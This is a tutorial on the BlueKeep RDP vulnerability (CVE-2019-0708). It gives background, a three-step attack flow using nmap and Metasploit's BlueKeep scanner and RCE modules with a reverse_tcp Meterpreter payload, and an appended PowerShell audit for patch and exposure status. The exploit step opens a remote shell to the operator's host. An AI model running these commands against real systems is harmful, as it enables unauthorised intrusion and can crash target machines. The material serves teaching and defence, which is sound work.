# Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

## CVE-2019-0708 - BlueKeep

* BlueKeep (CVE-2019-0708) is the name given to an RDP vulnerability in Windows that allows an unauthenticated attacker to remotely execute arbitrary code, gain access to the affected Windows system and, from there, to the network that system is part of.
* The BlueKeep vulnerability was made public by Microsoft in May 2019.
* The BlueKeep exploit takes advantage of a flaw in Windows' RDP implementation that gives attackers access to a chunk of kernel memory, consequently allowing them to remotely execute arbitrary code at the SYSTEM level without authentication.
* Microsoft released a patch for this vulnerability on May 14th, 2019 and has urged companies to patch this vulnerability as soon as possible.
* At the time of discovery, about 1 million systems worldwide were found to be vulnerable.
* The BlueKeep vulnerability affects multiple versions of Windows:
  * XP
  * Vista
  * Windows 7
  * Windows Server 2008 & R2
* Many of the publicly circulating PoCs and exploit scripts for BlueKeep are illegitimate and some are outright malicious. It is therefore recommended to only use verified exploit code and modules.
* Metasploit (MSF) has an auxiliary module that can be used to check if a target system is vulnerable to BlueKeep, and an exploit module that can be used to exploit the vulnerability on unpatched systems.
* The BlueKeep exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged Meterpreter session on the target system.

**Note: Targeting Kernel space memory and applications can cause system crashes.**

## Attack Flow for the Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

### 1. **Confirm Presence of RDP**

**Objective:** Verify if the target system has RDP (Remote Desktop Protocol) enabled.

**Command:**

```bash
nmap -p 3389 <Target_IP>
```

**Description:** Use Nmap to scan port 3389 on the target system to check if RDP service is available.

### 2. **Assess BlueKeep Vulnerability**

**Objective:** Determine if the target system is vulnerable to the BlueKeep vulnerability (CVE-2019-0708).

**Command:**

```bash
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <Target_IP>
run
```

**Description:** Use the `cve_2019_0708_bluekeep` scanner module in Metasploit to check if the target system is vulnerable to BlueKeep.

### 3. **Exploit BlueKeep Vulnerability**

**Objective:** Exploit the BlueKeep vulnerability to gain remote code execution on the target system.

**Command:**

```bash
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit
```

**Description:** Use the `cve_2019_0708_bluekeep_rce` exploit module in Metasploit to exploit the vulnerability and establish a Meterpreter session.

**Note: Targeting Kernel space memory and applications can cause system crashes.**
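From the defending side, the same three steps map onto an exposure check: is RDP reachable, is the host an affected version, and has the May 2019 update been applied. The following PowerShell audit is an added example, not part of the original page or of Metasploit; it assumes the standard Terminal Server registry locations and the KB numbers of the Windows 7 SP1 / Server 2008 R2 SP1 updates (KB4499175 monthly rollup, KB4499180 security-only), which should be verified against the Microsoft advisory for other affected versions.

```powershell
# Added example: audit a Windows host for BlueKeep (CVE-2019-0708) exposure.
# Run locally with administrative rights on the host being checked.

$tsKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpTcpKey = "$tsKey\WinStations\RDP-Tcp"

# Affected families: XP/2003 (5.1, 5.2), Vista/2008 (6.0), 7/2008 R2 (6.1).
# Windows 8/10 and Server 2012+ are not affected.
$os       = Get-CimInstance -ClassName Win32_OperatingSystem
$affected = $os.Version -match '^(5\.1|5\.2|6\.0|6\.1)\.'

# RDP is reachable only when inbound TS connections are not denied.
$rdpEnabled = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections -eq 0

# NLA forces authentication before the vulnerable channel handling is reached;
# it is a mitigation, not a fix, so it is reported separately from patch state.
$nlaRequired = (Get-ItemProperty -Path $rdpTcpKey -Name UserAuthentication).UserAuthentication -eq 1

# Assumed KB numbers for Windows 7 SP1 / Server 2008 R2 SP1 (May 14, 2019 updates).
$patchIds = 'KB4499175', 'KB4499180'
$patched  = [bool](Get-HotFix -Id $patchIds -ErrorAction SilentlyContinue)

[pscustomobject]@{
    Host        = $env:COMPUTERNAME
    OSVersion   = $os.Version
    AffectedOS  = $affected
    RDPEnabled  = $rdpEnabled
    NLARequired = $nlaRequired
    Patched     = $patched
    # Exposed: affected build, RDP on, update missing. NLA lowers the risk
    # but does not clear it, so it is deliberately left out of this verdict.
    Exposed     = ($affected -and $rdpEnabled -and -not $patched)
}
```

A host reporting `Exposed = True` should be patched first; disabling RDP or requiring NLA is the stopgap until the update is installed.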

